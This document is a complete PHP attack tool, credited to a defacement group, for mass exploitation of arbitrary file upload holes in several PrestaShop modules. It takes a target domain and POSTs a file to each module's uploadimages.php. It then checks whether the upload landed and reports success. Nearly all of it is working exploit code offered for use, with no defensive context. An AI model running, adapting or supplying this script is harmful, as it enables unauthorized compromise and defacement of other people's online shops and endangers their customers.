Prestashop Arbitary File Upload

1. <?php
2. @session_start();
3. @error_reporting(0);
4. @ini_set('error_log',NULL);
5. @ini_set('log_errors',0);
6. @ini_set('display_errors', 0);
7. @set_time_limit(0);
8. /*
9. Name app : Prestashop Arbitary File Upload
10. Author / Editor Script : AZZATSSINS CYBERSERKERS
11. Email : [email protected]
12. */
13. echo"<title>Prestashop Arbitary File Upload</title><center>
14. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
15. </b></i></u><br>
16.     <form method='post'>
17.     Domain: <br>
18.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
19.     <input type='submit' name='azzatssins' value='Fuck it!'>
20.     </form><br>";
21.     if($_POST['azzatssins']) {
22. $site = $_POST['url'];
23. $file = "ac.html";
24. echo "<br><u><b>Target : ".$site."</b></u><br>";
25. $expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
26. foreach($expl as $exploit){
27. $post = array("userfile" => "@$file",
28. );
29. $azzatssins = $site.$exploit."/uploadimages.php";
30. $ch2 = curl_init ($azzatssins);
31. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
32. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
33. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
34. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
35. curl_setopt ($ch2, CURLOPT_POST, 1);
36. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
37. $data = curl_exec ($ch2);
38. $cyberserkers = $site.$exploit."/file_uploads/".$file;
39. $azzatssinscyberserkers = @file_get_contents($cyberserkers);
40.             if(preg_match('#AZZATSSINS#i',$azzatssinscyberserkers)){
41.             echo "<br> [#]Exploit Success :) <br>[#] ".$cyberserkers."<br><hr><br>";
42.             }else{
43.                 echo "<br>";}
44. } }
45. ?>